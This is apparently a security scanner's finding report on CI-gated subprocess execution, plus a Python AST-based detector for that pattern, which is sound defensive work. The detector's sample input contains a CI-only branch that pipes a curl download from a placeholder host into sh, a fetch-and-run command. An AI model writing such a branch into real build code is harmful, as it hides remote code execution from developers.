Grade: A (92/100)
First seen: Feb 18, 2026
Last scanned: Feb 20, 2026
Findings: 1 (MEDIUM: 1)

Findings (1)

MEDIUM
Conditional CI execution
Location: line 32 of the scanned file
Rule: detects conditional execution based on CI environment variables combined with dangerous commands
Match: `if deps precomputed in CI` + subprocess call
FIX: Do not gate execution on CI environment variables (CI, GITHUB_ACTIONS and similar). A branch that only runs subprocess commands when it detects a CI environment is the shape of build-time code that behaves differently for developers than for the build server, so run the same code path locally and in CI and keep CI-only steps in the reviewed pipeline configuration. Pin all dependencies to exact versions with integrity hashes, use lock files (package-lock.json, poetry.lock), and enable checksum verification in your package manager so a CI-only install path cannot resolve to different code.
FP?
Likely FP if the match is a comment or documentation describing the build (the matched text `if deps precomputed in CI` reads like a comment) rather than executable code that tests a CI environment variable and then runs a subprocess. Confirm by checking whether line 32 is code or a comment and, if it is code, whether the command it runs is under the maintainer's control.
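The rule behind this finding, as an added example and not the scanner's own code: an AST-based check for Python source that reports an `if` whose condition reads a CI environment variable and whose body calls subprocess or os.system. Because it works on the parsed tree rather than on text, a comment such as `# if deps precomputed in CI` is not matched, which is exactly the false-positive case noted above. The list of CI variable names, the set of dangerous calls and the sample source are assumptions constructed for this example.

```python
import ast

# CI-indicator environment variables checked by the example rule (assumed list).
CI_ENV_VARS = {"CI", "GITHUB_ACTIONS", "GITLAB_CI", "TRAVIS", "CIRCLECI",
               "BUILDKITE", "JENKINS_URL"}

# Calls treated as "dangerous commands" when they sit inside a CI-gated branch.
DANGEROUS_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                   "subprocess.check_call", "subprocess.check_output",
                   "os.system", "os.popen"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _ci_vars_in(node):
    """Collect CI variable names read through os.environ / os.getenv in a subtree."""
    found = set()
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            # os.environ.get("CI") / os.getenv("CI")
            fn = _dotted_name(sub.func)
            if fn in {"os.environ.get", "os.getenv"} and sub.args:
                arg = sub.args[0]
                if isinstance(arg, ast.Constant) and arg.value in CI_ENV_VARS:
                    found.add(arg.value)
        elif isinstance(sub, ast.Subscript) and _dotted_name(sub.value) == "os.environ":
            # os.environ["CI"]  (Python 3.9+: slice is the expression itself)
            if isinstance(sub.slice, ast.Constant) and sub.slice.value in CI_ENV_VARS:
                found.add(sub.slice.value)
        elif isinstance(sub, ast.Compare):
            # "CI" in os.environ
            if (isinstance(sub.left, ast.Constant) and sub.left.value in CI_ENV_VARS
                    and any(isinstance(op, ast.In) for op in sub.ops)
                    and any(_dotted_name(c) == "os.environ" for c in sub.comparators)):
                found.add(sub.left.value)
    return found


def _dangerous_calls_in(nodes):
    """Return (lineno, dotted call name) for every dangerous call under the given nodes."""
    hits = []
    for n in nodes:
        for sub in ast.walk(n):
            if isinstance(sub, ast.Call) and _dotted_name(sub.func) in DANGEROUS_CALLS:
                hits.append((sub.lineno, _dotted_name(sub.func)))
    return hits


def find_conditional_ci_execution(source):
    """Return [(if_lineno, sorted CI vars in the test, [(call_lineno, call_name), ...]), ...].

    Only `if` statements whose *condition* reads a CI variable and whose *body*
    contains a dangerous call are reported; comments never reach the AST.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.If):
            continue
        ci_vars = _ci_vars_in(node.test)
        if not ci_vars:
            continue
        calls = _dangerous_calls_in(node.body)
        if calls:
            findings.append((node.lineno, sorted(ci_vars), calls))
    return findings


# Constructed sample: one comment that should not match, one CI branch that
# runs a shell pipeline, one CI branch with no dangerous call, one os.system branch.
SAMPLE_SOURCE = '''\
import os
import subprocess

# if deps precomputed in CI, skip the build step   (comment only: must not match)
def build():
    if os.environ.get("CI"):
        subprocess.run(["sh", "-c", "curl -s https://example.invalid/setup.sh | sh"])
    if "GITHUB_ACTIONS" in os.environ:
        verbose = True
    if os.environ["CI"] == "true":
        os.system("echo ci")
'''

if __name__ == "__main__":
    for if_line, ci_vars, calls in find_conditional_ci_execution(SAMPLE_SOURCE):
        print(f"line {if_line}: branch on {ci_vars} runs {calls}")
```

Running the block reports the branches at lines 6 and 10 of the sample and nothing for the comment on line 4 or the harmless branch at line 8. A scanner that matches on text instead of the AST would also flag line 4, which is the false-positive mode described in the note above; when triaging, check whether the flagged line is code the parser would keep.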